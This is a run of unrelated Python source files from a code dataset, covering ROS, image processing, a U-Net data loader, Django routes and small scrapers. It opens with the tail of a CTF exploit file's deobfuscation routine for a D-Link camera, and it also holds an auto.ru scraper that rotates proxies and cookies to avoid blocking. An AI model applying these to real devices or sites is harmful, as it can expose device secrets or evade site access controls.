ord('Z')) & 0xff\n c = (c - ord('e')) & 0xff\n r.append(c)\n\n tmp = None\n i = len(r) - 1\n while i >= 0:\n if i == 
len(r) - 1:\n x = r[i]\n tmp = ((x & 7) << 5) & 0xff\n\n if i == 0:\n assert tmp is not None\n x = r[0]\n x = (x >> 3) & 0xff\n x = (x + tmp) & 0xff\n r[0] = x\n else:\n c1 = r[i-1]\n c2 = r[i]\n c1 = c1 & 0x7\n c2 = (c2 >> 3) & 0xff\n c1 = (c1 << 5) & 0xff\n c2 = (c2 + c1) & 0xff\n r[i] = c2\n i = i - 1\n\n r = \"\".join([chr(x) for x in r])\n\n s = \"\"\n assert (len(r) % 2) == 0\n for i in range(len(r)//2):\n s += r[i+(len(r)//2)] + r[i]\n \n return s\n\n\ndef main():\n data = sys.stdin.read()\n s = deobfuscate(data)\n sys.stdout.write(s)\n\nmain()\n\n","repo_name":"cyberxml/iot-resources","sub_path":"ctf/dlink-dcs930l/exploit/dcs901l-edb24442.py","file_name":"dcs901l-edb24442.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40246156697","text":"#!/usr/bin/env python\n\n#This hasn't been added to index.html\nimport rospy\nimport dynamic_reconfigure.client\nfrom std_msgs.msg import Empty\n\nclass Laser(object):\n def __init__(self):\n self.client = dynamic_reconfigure.client.Client('camera_synchronizer_node')\n\n def laser_ON(self, msg):\n \tparams = { 'narrow_stereo_trig_mode' : 3 }\n \tself.client.update_configuration(params)\n\n def laser_OFF(self, msg):\n \tparams2 = { 'narrow_stereo_trig_mode' : 4 }\n \tself.client.update_configuration(params2)\n \n\ndef main():\n\trospy.init_node('laser_node')\n\tlaser = Laser()\n\trospy.Subscriber('laser_ON', Empty, laser.laser_ON)\n\trospy.Subscriber('laser_OFF', Empty, laser.laser_OFF)\n\trospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hcrlab/rws_simple_action_interface","sub_path":"scripts/laser_node.py","file_name":"laser_node.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28849794155","text":"from __future__ import print_function\nfrom builtins import input\nfrom skimage.io import imread, imshow\nimport cv2\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\n\nimage=cv2.imread(\"../img/5.jpg\")\nimage=cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\nnew_image = np.zeros(image.shape, image.dtype)\nalpha = 1.0 # Simple contrast control\nbeta = 0 # Simple brightness control\n\nprint(' Basic Linear Transforms ')\nprint('-------------------------')\ntry:\n alpha = float(input('* Enter the alpha value [1.0-3.0]: '))\n beta = int(input('* Enter the beta value [0-100]: '))\nexcept ValueError:\n print('Error, not a number')\n\n\n\nfor y in range(image.shape[0]):\n for x in range(image.shape[1]):\n for c in range(image.shape[2]):\n new_image[y,x,c] = np.clip(alpha*image[y,x,c] + beta, 0, 255)\n\n\n\nplt.subplot(211),imshow(image)\nplt.title('Original Image')\nplt.subplot(212),imshow(new_image)\nplt.title('new Image')\nplt.show()\n","repo_name":"mohitrawat9885/Machine-Learning-Image-Video-Processing-","sub_path":"Image_Enhance/brightness_contrast.py","file_name":"brightness_contrast.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28222604391","text":"# tf_unet is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# tf_unet is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.\r\n\r\n'''\r\nauthor: jakeret\r\n'''\r\nfrom __future__ import print_function, division, absolute_import, unicode_literals\r\n\r\nimport glob\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport cv2\r\n\r\nclass BaseDataProvider(object):\r\n \"\"\"\r\n Abstract base class for DataProvider implementation. Subclasses have to\r\n overwrite the `_next_data` method that loads the next data and label array.\r\n This implementation automatically clips the data with the given min/max and\r\n normalizes the values to (0,1]. To change this behavior the `_process_data`\r\n method can be overwritten. To enable some post processing such as data\r\n augmentation the `_post_process` method can be overwritten.\r\n\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n\r\n \"\"\"\r\n \r\n channels = 1\r\n n_class = 2\r\n \r\n\r\n def __init__(self, a_min=None, a_max=None):\r\n self.a_min = a_min if a_min is not None else -np.inf\r\n self.a_max = a_max if a_max is not None else np.inf\r\n\r\n def _load_data_and_label(self):\r\n data, label = self._next_data()\r\n \r\n train_data = self._process_data(data)\r\n labels = self._process_labels(label)\r\n \r\n train_data, labels = self._post_process(train_data, labels)\r\n \r\n nx = train_data.shape[1]\r\n ny = train_data.shape[0]\r\n\r\n return train_data.reshape(1, ny, nx, self.channels), labels.reshape(1, ny, nx, self.n_class),\r\n \r\n def _process_labels(self, label):\r\n\r\n if self.n_class == 2:\r\n nx = label.shape[1]\r\n ny = label.shape[0]\r\n labels = np.zeros((ny, nx, self.n_class), dtype=np.float32)\r\n labels[..., 1] = label\r\n labels[..., 0] = ~label\r\n return labels\r\n\r\n return label\r\n \r\n def _process_data(self, data):\r\n # normalization\r\n data = np.clip(np.fabs(data), self.a_min, self.a_max)\r\n data -= np.amin(data)\r\n if np.amax(data) != 0:\r\n data /= np.amax(data)\r\n return data\r\n \r\n def _post_process(self, data, labels):\r\n \"\"\"\r\n Post processing hook that can be used for data augmentation\r\n \r\n :param data: the data array\r\n :param labels: the label array\r\n \"\"\"\r\n\r\n row, col = data.shape[:2]\r\n bottom = data[row - 2:row, 0:col]\r\n mean = cv2.mean(bottom)[0]\r\n\r\n bordersize = 25\r\n data_with_border = cv2.copyMakeBorder(data, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=[0, 0, 0])\r\n\r\n #\r\n #\r\n # row, col = labels.shape[:2]\r\n # bottom = labels[row - 2:row, 0:col]\r\n # mean = cv2.mean(bottom)[0]\r\n #\r\n # labels_with_border = cv2.copyMakeBorder(data, top=bordersize, bottom=bordersize, left=bordersize, right=bordersize, borderType=cv2.BORDER_CONSTANT, value=[mean])\r\n\r\n\r\n\r\n # shape = data.shape\r\n # w = shape[1]\r\n # h = shape[0]\r\n #\r\n # base_size = h + 30, w + 30, 3\r\n # # make a 3 channel image for base which is slightly larger than target img\r\n # base = np.zeros(base_size, dtype=np.uint8)\r\n # cv2.rectangle(base, (0, 0), (w + 30, h + 30), (255, 255, 255), 30) # really thick white rectangle\r\n # base[10:h + 10, 10:w + 10] = data\r\n\r\n\r\n # shape = labels.shape\r\n # w = shape[1]\r\n # h = shape[0]\r\n #\r\n # base_size = h + 30, w + 30, 
2\r\n # # make a 3 channel image for base which is slightly larger than target img\r\n # base = np.zeros(base_size, dtype=np.uint8)\r\n # cv2.rectangle(base, (0, 0), (w + 30, h + 30), (255, 255, 255), 30) # really thick white rectangle\r\n # base[10:h + 10, 10:w + 10] = labels\r\n\r\n return data, labels\r\n \r\n def __call__(self, n):\r\n train_data, labels = self._load_data_and_label()\r\n nx = train_data.shape[1]\r\n ny = train_data.shape[2]\r\n \r\n X = np.zeros((n, nx, ny, self.channels))\r\n Y = np.zeros((n, nx, ny, self.n_class))\r\n \r\n X[0] = train_data\r\n Y[0] = labels\r\n for i in range(1, n):\r\n train_data, labels = self._load_data_and_label()\r\n X[i] = train_data\r\n Y[i] = labels\r\n \r\n return X, Y\r\n \r\nclass SimpleDataProvider(BaseDataProvider):\r\n \"\"\"\r\n A simple data provider for numpy arrays. \r\n Assumes that the data and label are numpy array with the dimensions\r\n data `[n, X, Y, channels]`, label `[n, X, Y, classes]`. Where\r\n `n` is the number of images, `X`, `Y` the size of the image.\r\n\r\n :param data: data numpy array. Shape=[n, X, Y, channels]\r\n :param label: label numpy array. Shape=[n, X, Y, classes]\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n :param channels: (optional) number of channels, default=1\r\n :param n_class: (optional) number of classes, default=2\r\n \r\n \"\"\"\r\n \r\n def __init__(self, data, label, a_min=None, a_max=None, channels=1, n_class=2):\r\n super(SimpleDataProvider, self).__init__(a_min, a_max)\r\n self.data = data\r\n self.label = label\r\n self.file_count = data.shape[0]\r\n self.n_class = n_class\r\n self.channels = channels\r\n\r\n def _next_data(self):\r\n idx = np.random.choice(self.file_count)\r\n return self.data[idx], self.label[idx]\r\n\r\n\r\nclass ImageDataProvider(BaseDataProvider):\r\n \"\"\"\r\n Generic data provider for images, supports gray scale and colored images.\r\n Assumes that the data images and label images are stored in the same folder\r\n and that the labels have a different file suffix \r\n e.g. 'train/fish_1.tif' and 'train/fish_1_mask.tif'\r\n\r\n Usage:\r\n data_provider = ImageDataProvider(\"..fishes/train/*.tif\")\r\n \r\n :param search_path: a glob search pattern to find all data and label images\r\n :param a_min: (optional) min value used for clipping\r\n :param a_max: (optional) max value used for clipping\r\n :param data_suffix: suffix pattern for the data images. Default '.tif'\r\n :param mask_suffix: suffix pattern for the label images. Default '_mask.tif'\r\n :param shuffle_data: if the order of the loaded file path should be randomized. 
Default 'True'\r\n :param channels: (optional) number of channels, default=1\r\n :param n_class: (optional) number of classes, default=2\r\n \r\n \"\"\"\r\n \r\n def __init__(self, search_path, a_min=None, a_max=None, data_suffix=\".jpg\", mask_suffix='_mask.tif', shuffle_data=True, n_class=2):\r\n super(ImageDataProvider, self).__init__(a_min, a_max)\r\n self.data_suffix = data_suffix\r\n self.mask_suffix = mask_suffix\r\n self.file_idx = -1\r\n self.shuffle_data = shuffle_data\r\n self.n_class = n_class\r\n \r\n self.data_files = self._find_data_files(search_path)\r\n \r\n if self.shuffle_data:\r\n np.random.shuffle(self.data_files)\r\n\r\n try:\r\n assert len(self.data_files) > 0, \"No training files\"\r\n except Exception:\r\n print('Dang!')\r\n print(\"Number of files used: %s\" % len(self.data_files))\r\n \r\n img = self._load_file(self.data_files[0])\r\n self.channels = 1 if len(img.shape) == 2 else img.shape[-1]\r\n \r\n def _find_data_files(self, search_path):\r\n all_files = glob.glob(search_path + r'\\*', recursive=True)\r\n all_files = [i for i in all_files if r'.xml' not in i]\r\n all_files = [i for i in all_files if r'.ovr' not in i]\r\n all_files = [i for i in all_files if r'.jgw' not in i]\r\n # return [name for name in all_files if self.data_suffix in name and self.mask_suffix not in name]\r\n\r\n exclusions = ['BX24_500_013026', 'BX24_500_013027', 'BX24_500_013028', 'BX24_500_013034', 'BX24_500_013035', 'BX24_500_014028', 'BX24_500_014029', 'BX24_500_014030',\r\n 'BX24_500_013026_mask', 'BX24_500_013027_mask', 'BX24_500_013028_mask', 'BX24_500_013034_mask', 'BX24_500_013035_mask', 'BX24_500_014028_mask', 'BX24_500_014029_mask',\r\n 'BX24_500_014030_mask']\r\n\r\n all_files_with_exclusions = [i for i in all_files if i.split('.')[0].split('\\\\')[-1] not in exclusions]\r\n return all_files_with_exclusions ## COMPLETE EXCLUSIONS\r\n \r\n def _load_file(self, path, dtype=np.float32, format='image_file'):\r\n if format == 'image_file':\r\n images = cv2.imread(path)\r\n images_scaled = cv2.resize(images, (400, 600))\r\n return np.array(images_scaled, dtype)\r\n elif format == 'GeoTiff':\r\n mask = np.squeeze(cv2.imread(path, cv2.IMREAD_GRAYSCALE))\r\n mask_scaled = cv2.resize(mask, (400, 600))\r\n return np.array(mask_scaled, np.bool)\r\n\r\n def _cycle_file(self):\r\n self.file_idx += 1\r\n if self.file_idx >= len(sorted([i for i in self.data_files if i.split('.')[1] == self.data_suffix.split('.')[1]])):\r\n self.file_idx = 0 \r\n if self.shuffle_data:\r\n np.random.shuffle(self.data_files)\r\n \r\n def _next_data(self):\r\n self._cycle_file()\r\n\r\n image_name = sorted([i for i in self.data_files if i.split('.')[1] == self.data_suffix.split('.')[1]])[self.file_idx]\r\n\r\n try:\r\n label_name = sorted([i for i in self.data_files if i.split('.')[1] == self.mask_suffix.split('.')[1]])[self.file_idx]\r\n except IndexError:\r\n print('Index Out of Range')\r\n label_name = None\r\n\r\n img = self._load_file(image_name, np.float32, 'image_file')\r\n if label_name not in self.data_files:\r\n # label = np.array(np.random.rand(400, 600), np.bool)\r\n label = np.empty(shape=(400, 600), dtype=np.bool)\r\n\r\n\r\n else:\r\n label = self._load_file(label_name, np.bool, 'GeoTiff')\r\n return img, label\r\n","repo_name":"NumbaCruncha/RoadDetection","sub_path":"tf_unet/image_util.py","file_name":"image_util.py","file_ext":"py","file_size_in_byte":10644,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} 
+{"seq_id":"15126632728","text":"\"\"\"OTAI URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom myapp.views import *\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url('^$', nameOfHomepage, name=\"homepage\"), # HomePage front end url\n url('^contact-us', nameOfContactUs, name=\"contact_us\"), # Contact Us url\n url('^pricing', nameOfPricing, name=\"pricing\"), # Pricing url\n url('^sign-up/$', nameOfSignUp, name=\"sign-up\"), # SignUpPage url\n url(r'^activation/$', nameOfActivation, name='activation'), # Activation url\n url('^login/$', nameOfLogin, name=\"login\"), # Login url\n url('^home', nameOfHomePage, name=\"home\"), # Admin Home page backend\n url('^logout', nameOfLogout, name=\"logout\"), #Logout\n\n]\n","repo_name":"anithahosamani/DjangoMongoDB","sub_path":"OTAI/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124018710","text":"from typing import List\n\nclass Solution:\n def findLengthOfLCIS(self, nums: List[int]) -> int:\n if len(nums) <= 1:\n return len(nums)\n curLength = 1\n maxLength = 1\n for i in range(1, len(nums)):\n if nums[i-1] < nums[i]:\n # print(nums[i], \"is greater than\", nums[i-1])\n curLength += 1\n # print(\"curLength:\", curLength)\n else:\n curLength = 1\n maxLength = max(curLength, maxLength)\n # print(\"maxLength:\", maxLength)\n return maxLength\n\n\n# test driver\nsol = Solution()\narr = [1,3,5,4,7]\nprint(\"Input:\", arr)\nprint(\"Output:\", sol.findLengthOfLCIS(arr))","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"DynamicProgramming/LongestIncreasingSubsequence/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74337148961","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 22 00:04:10 2022\n\n@author: ilirsheraj\n\"\"\"\n# In this module we will write a bad hashing function just to understand the concept\n\ndata = [\n (\"orange\", \"a sweet, orange, citrus fruit\"),\n (\"apple\", \"good for making cider\"),\n (\"lemon\", \"a sour, yellow citrus fruit\"),\n (\"grape\", \"a small, sweet fruit growing in branches\"),\n (\"melon\", \"sweet and juicy\"),\n ]\n\n# # To get an integer from each letter using ord() built-in function\n# # Every character is represented by a unique number\n# print(ord(\"a\"))\n# print(ord(\"b\"))\n# print(ord(\"z\"))\n\n# # Let's run the hashing function\ndef simple_hash(s: str) -> int:\n \"\"\"\n A ridiculously simple hashing function\n \"\"\"\n basic_hash = ord(s[0])\n return basic_hash % 10\n\n\n# for key, value in data:\n# h = simple_hash(key)\n# print(key, h)\n\n\n# # Let's call the python built-in hash function and 
see what happens\n# for key, value in data:\n# h = hash(key)\n# print(key, h)\n\n\n\ndef get(k: str) -> str:\n \"\"\"\n Return the value of a key, or None if the key does not exist\n \"\"\"\n hash_code = simple_hash(k)\n if values[hash_code]:\n return values[hash_code]\n else:\n return None\n\n\n# We will create two lists\nkeys = [\"\"] * 10\nvalues = keys.copy() \n \nfor key, value in data:\n h = simple_hash(key)\n # h = hash(key)\n print(key,h)\n keys[h] = key\n values[h] = value\n \nprint(keys)\nprint(values)\nprint()\n\nvalue = get(\"lemon\")\nprint(value)\nprint()\nprint(get(\"grape\"))\nprint()\nprint(get(\"tomato\"))\nprint()\nprint(get(\"banana\"))","repo_name":"ilirsheraj/PythonMasterClass","sub_path":"DictSet/atrocious_hash.py","file_name":"atrocious_hash.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25591082425","text":"# import modules-----------\nimport urllib.request\nimport urllib.error\nimport bs4\n\n# open and get site------------------\n\n# get url\nurl = input(\"Please input azlyrics from which to scrape: \")\n# getting site\ntry:\n contentSite = urllib.request.urlopen(url) #get site\nexcept urllib.error.HTTPError as urlHttpErr:\n print(\"Error retrieving page! Error Code: \" + str(urlHttpErr))\nexcept urllib.error.URLError as urlErr:\n print(\"Ran into a problem while retrieving page! Error Code: \" +\n str(urlErr))\nexcept:\n print(\"Error!\")\n# parse site\ncontentSoup = bs4.BeautifulSoup(contentSite, \"html.parser\")\n\n# scrape lyrics------------------\n\n# Lyrics in div element without class\ncontentLyrics = contentSoup.find_all(\"div\", attrs = {\"class\":None})\n\n# extract text from lyrics=============\nunformattedLyrics = []\nfor i in contentLyrics[1]:\n if \"<\" not in i and \">\" not in i:\n unformattedLyrics.append(i)\n else:\n continue\n\n# removing the <br/> from the end of the lyrics=============\nfor i in range(len(unformattedLyrics)):\n if \"<br/>\" in unformattedLyrics[i]:\n unformattedLyrics[i] = unformattedLyrics[i].replace(\"<br/>\", \"\")\n else:\n continue\n# removing the first line (disclaimer) from the lyrics\nunformattedLyrics = unformattedLyrics[2:]\n\n# removing the '<br/>' occurrences from the file=============\nfinalLyrics = [i if not isinstance(i, bs4.element.Tag) else \"\" for i in unformattedLyrics]\n\n# writing lyrics to a file------------\n\n# get file name from user\nfileName = input(\"To what file would you like to write the lyrics to? 
\")\ntry:\n with open(fileName + \".txt\", \"w\") as lyricsFile:\n for i in finalLyrics:\n print(i, file = lyricsFile)\nexcept IOError as ioerr:\n print(\"Error opening file: \" + str(ioerr))\n","repo_name":"krishnamurthypranesh/AzlyricsScraper","sub_path":"scrapeLyrics.py","file_name":"scrapeLyrics.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26205698883","text":"from pygame import mixer # Load the required library\nimport os\n\nTrek_sounds = {'open_image': 'tos_com_beep_3.mp3',\n 'classAnalysis': 'hail_allship_ep.mp3',\n 'material_identification': 'romulan_transporter.mp3',\n 'other': 'hail_allship_ep.mp3'}\n\nsound_classes = {'Trek': Trek_sounds}\n\ndef play(sound_class, sound_type):\n\n # return if no sound class is passed\n if sound_class is None:\n return\n\n sounds = sound_classes[sound_class]\n if sound_type in sounds.keys():\n sound = sounds[sound_type]\n else:\n sound = sounds['other']\n\n mixer.init()\n mixer.music.load(os.path.join(os.getcwd(), sound))\n mixer.music.play()\n\n","repo_name":"wbasener/hyperspectralpy","sub_path":"spectralAdv/easterEggSounds.py","file_name":"easterEggSounds.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"12163761822","text":"import sys\nfrom pprint import pprint\nimport re\nimport datetime\nfrom multiprocessing import Pool\nfrom itertools import cycle, chain\n\nfrom bs4 import BeautifulSoup\nfrom pyvirtualdisplay import Display\n\nimport logger\nfrom selenium_driver import SeleniumDriver\nfrom sleep import scrapping_sleep\nfrom lists_methods import merge_list_of_lists, slice_list\nfrom string_to_number import string_to_number\nfrom database import db_connect\n\nfrom platform_config import PLATFORM\nfrom proxies import AUTO_RU_SCRAPPER_PROXIES\nfrom common_config import LOGFILE_PATH, START_YEAR, SCRAPPING_SOURCES, AUTO_RU_REGIONS_ALIASES, SEARCH_PARAMS, SELENIUM_WIRE_OPTIONS, AUTO_RU_ERROR_PAGE_URL, AUTO_RU_COOKIES, OFFERS_SCRAPPER_PROCESSES_COUNT\n\nlogger = logger.get_logger(__name__, LOGFILE_PATH)\nstart_time = datetime.datetime.now()\nprocesses_count = OFFERS_SCRAPPER_PROCESSES_COUNT\n\n\ndef scrape_offers(region='Санкт-Петербург'):\n    \"\"\"Scraping offers from a listing.\n\n    Args:\n        region (string, optional): The region to parse data. 
Defaults to \"Санкт-Петербург\"\n \"\"\"\n\n parsing_options = prepare_base_page_parsing_options()\n\n options = list(map(lambda x: {\n 'wire_options': x['wire_options'],\n 'region': region,\n 'years': x['years']\n }, parsing_options))\n\n if PLATFORM == 'linux64':\n display = Display()\n display.start()\n\n with Pool(processes=processes_count) as pool:\n results = pool.map(get_base_pages_data, options)\n pool.close()\n pool.join()\n\n page_sources = get_pages_sources(results)\n\n offers_data = []\n\n for source_code in page_sources:\n page_offers_data = get_offers_data(source_code, region)\n\n if len(page_offers_data) == 0:\n logger.warning('No offers found on the page.')\n continue\n\n offers_data = offers_data + page_offers_data\n\n logger.warning(\n f'Total offers: {len(offers_data)}.')\n\n offers_data = filter_existing_offers(offers_data)\n add_offers_to_db(offers_data)\n\n logger.warning(\n f'Script execution time: {datetime.datetime.now() - start_time}')\n\n if 'display' in locals():\n display.stop()\n\n\ndef get_pages_sources(data_list):\n \"\"\"Getting page sources.\n\n Args:\n data_list (list): The list of dictionaries with `page_sources` and `pagination_urls` keys.\n\n Returns:\n list: The list of pages' source code.\n \"\"\"\n page_sources = []\n pagination_urls = []\n\n for data in data_list:\n page_sources.append(data['page_sources'])\n\n if 'pagination_urls' in data:\n pagination_urls += data['pagination_urls']\n\n pagination_urls = merge_list_of_lists(pagination_urls)\n page_sources = merge_list_of_lists(page_sources)\n\n if len(pagination_urls) > 0:\n logger.warning(\n f'Total pagination pages for all base pages: {len(pagination_urls)}')\n options = prepare_listing_page_parsing_options(pagination_urls)\n\n with Pool(processes=processes_count) as pool:\n pagination_page_source = pool.map(get_listing_page_source, options)\n pool.close()\n pool.join()\n\n pagination_page_source = merge_list_of_lists(pagination_page_source)\n page_sources += pagination_page_source\n\n return page_sources\n\n\ndef get_base_pages_data(options):\n \"\"\"Parsing the list of pagination URLs and the base page's source code.\n\n Args:\n options (dict): The options dictionary including `wire_options` key and `region` key.\n\n Returns:\n dict: The dictionary with pagination urls and base page's source code.\n \"\"\"\n\n wire_options = options['wire_options']\n region = options['region']\n years = options['years']\n\n region_alias = AUTO_RU_REGIONS_ALIASES[region]\n\n selenium_driver = SeleniumDriver(cookie_page_url=AUTO_RU_ERROR_PAGE_URL)\n selenium_driver.init_driver(wire_options)\n selenium_driver.set_cookies(AUTO_RU_COOKIES)\n\n output = {\n 'page_sources': [],\n 'pagination_urls': []\n }\n\n for year in years:\n logger.warning(f'Parameters: year {year}, region {region}')\n url = f'https://auto.ru/{region_alias}/cars/{year}-year/used/?{\"&\".join(SEARCH_PARAMS)}'\n logger.warning(\n f'Getting the source code for the base page with url {url}...')\n\n base_page_source = selenium_driver.get_page_source(url)\n pages_number = parse_pages_number(base_page_source)\n logger.warning(\n f'Total pagination pages for year {year}: {pages_number}')\n output['page_sources'].append(base_page_source)\n\n # Getting the pagination pages number - start.\n pagination_urls = []\n\n for page_number in range(1, pages_number + 1):\n\n if page_number == 1:\n continue\n\n pagination_urls.append(\n f'{url}&page={str(page_number)}')\n\n if len(pagination_urls) > 0:\n 
output['pagination_urls'].append(pagination_urls)\n # Getting the pagination pages number - end.\n\n scrapping_sleep()\n\n selenium_driver.quit()\n return output\n\n\ndef get_listing_page_source(options):\n \"\"\"Getting the listing page's source code by the URL.\n\n Args:\n options (dict): The dictionary with `wire_options` and `url` keys.\n\n Returns:\n list: The list of pages' source code.\n \"\"\"\n\n wire_options = options['wire_options']\n urls = options['urls']\n\n selenium_driver = SeleniumDriver(cookie_page_url=AUTO_RU_ERROR_PAGE_URL)\n selenium_driver.init_driver(wire_options)\n selenium_driver.set_cookies(AUTO_RU_COOKIES)\n\n page_sources = []\n\n for url in urls:\n logger.warning(f'Getting the source code for the page with URL {url}')\n page_source = selenium_driver.get_page_source(url)\n page_sources.append(page_source)\n scrapping_sleep()\n\n selenium_driver.quit()\n\n return page_sources\n\n\ndef prepare_listing_page_parsing_options(urls):\n \"\"\"Preparing parsing options\n\n Args:\n urls (list): The list of listing urls.\n\n Returns:\n list: The list of options.\n \"\"\"\n\n proxy_cycle = cycle(AUTO_RU_SCRAPPER_PROXIES)\n proxy = next(proxy_cycle)\n\n options = []\n urls_list = slice_list(urls, processes_count)\n options_count = min(len(urls_list), processes_count)\n\n for i in range(options_count):\n wire_options = SELENIUM_WIRE_OPTIONS.copy()\n wire_options['proxy'] = {\n 'https': f'https://{proxy}'\n }\n options.append({\n 'wire_options': wire_options,\n 'urls': urls_list[i]\n })\n proxy = next(proxy_cycle)\n\n return options\n\n\ndef prepare_base_page_parsing_options():\n \"\"\"Preparing parsing options\n\n Returns:\n list: The list of options including `wire_options` and `year` keys.\n \"\"\"\n\n current_year = start_time.year\n year = START_YEAR\n proxy_cycle = cycle(AUTO_RU_SCRAPPER_PROXIES)\n proxy = next(proxy_cycle)\n\n years = []\n\n while year <= current_year:\n years.append(year)\n year += 1\n\n years_list = slice_list(years, processes_count)\n\n options = []\n\n options_count = min(len(years_list), processes_count)\n\n for i in range(options_count):\n wire_options = SELENIUM_WIRE_OPTIONS.copy()\n wire_options['proxy'] = {\n 'https': f'https://{proxy}'\n }\n options.append({\n 'wire_options': wire_options,\n 'years': years_list[i]\n })\n proxy = next(proxy_cycle)\n\n return options\n\n\ndef parse_pages_number(page_source):\n \"\"\"Getting the URL's pages number.\n\n Args:\n page_source (string): The page source code.\n\n Returns:\n int: The pages number.\n \"\"\"\n\n soup = BeautifulSoup(page_source, 'html.parser')\n pages = soup.find_all(class_='ListingPagination__page')\n pages_number = 1\n\n if pages is not None:\n last_page = None\n\n for last_page in pages:\n pass\n\n if last_page:\n pages_number = int(last_page.get_text())\n\n return pages_number\n\n\ndef get_offers_data(source_code, region):\n \"\"\"Getting the page offers data\n\n Args:\n source_code (string): The page source code.\n region (string): The current region.\n\n Returns:\n list: The list of offers dictionaries.\n \"\"\"\n\n soup = BeautifulSoup(source_code, 'html.parser')\n offers_data = []\n\n offers_listing = soup.find(class_='ListingCars_outputType_list')\n\n if offers_listing is None:\n return offers_data\n\n offers_elements = offers_listing.find_all(class_='ListingItem')\n\n if len(offers_elements) == 0:\n return offers_data\n\n for offer_element in offers_elements:\n offer_data = {}\n\n try:\n url_element = offer_element.find(\n 'a', class_='ListingItemTitle__link')\n except:\n 
logger.warning('The offer link is missing.')\n continue\n\n try:\n href = url_element.get('href')\n except:\n logger.warning('The href attribute is missing for the offer.')\n continue\n\n href = href.split('?')[0]\n offer_data['url'] = href\n\n title = re.sub(' +', ' ', url_element.get_text())\n offer_data['title'] = title\n\n id_hash_data = get_id_hash_from_url(href)\n offer_id = id_hash_data['id']\n offer_hash = id_hash_data['hash']\n\n if offer_id is None or offer_hash is None:\n logger.warning(\n f'The offer with url {href} is missing id or hash.')\n continue\n\n offer_data['id'] = offer_id\n offer_data['hash'] = offer_hash\n\n price_element = offer_element.find(class_='ListingItem__price')\n\n if price_element is not None:\n price = price_element.get_text()\n price = string_to_number(price)\n offer_data['price'] = price\n\n release_year_element = offer_element.find(class_='ListingItem__year')\n\n if release_year_element is not None:\n release_year = release_year_element.get_text()\n release_year = string_to_number(release_year)\n offer_data['release_year'] = release_year\n\n run_element = offer_element.find(class_='ListingItem__kmAge')\n\n if run_element is not None:\n run = run_element.get_text()\n run = string_to_number(run)\n offer_data['run'] = run\n\n offer_data['createdon'] = datetime.datetime.now()\n offer_data['region'] = region\n offer_data['source'] = SCRAPPING_SOURCES['AUTO_RU']\n\n offers_data.append(offer_data)\n\n return offers_data\n\n\ndef filter_existing_offers(data):\n \"\"\"Filtering out offers that already exist in the database.\n\n Args:\n data (list): The list of offers' data.\n\n Returns:\n list: The filtered list of offers' data.\n \"\"\"\n\n sql = '''\n SELECT\n url\n FROM\n offers_list\n ;'''\n\n connection = db_connect()\n cursor = connection.cursor()\n cursor.execute(sql)\n existing_offers = cursor.fetchall()\n\n logger.warning(\n f'Number of offers in the database: {len(existing_offers)}')\n\n cursor.close()\n connection.close()\n\n existing_urls = [i[0] for i in existing_offers]\n urls_to_remove = []\n\n for parsed_offer in data:\n offer_url = parsed_offer['url']\n\n if offer_url in existing_urls:\n urls_to_remove.append(offer_url)\n\n data = list(filter(lambda x: x['url'] not in urls_to_remove, data))\n\n logger.warning(\n f'Number of offers to add to the database: {len(data)}')\n\n return data\n\n\ndef add_offers_to_db(data):\n \"\"\"Adding offers to the database.\n\n Args:\n data (list): The list of offers' data.\n \"\"\"\n\n connection = db_connect()\n cursor = connection.cursor()\n added_offers_number = 0\n\n for offer_data in data:\n offer_id = offer_data['id']\n offer_hash = offer_data['hash']\n url = 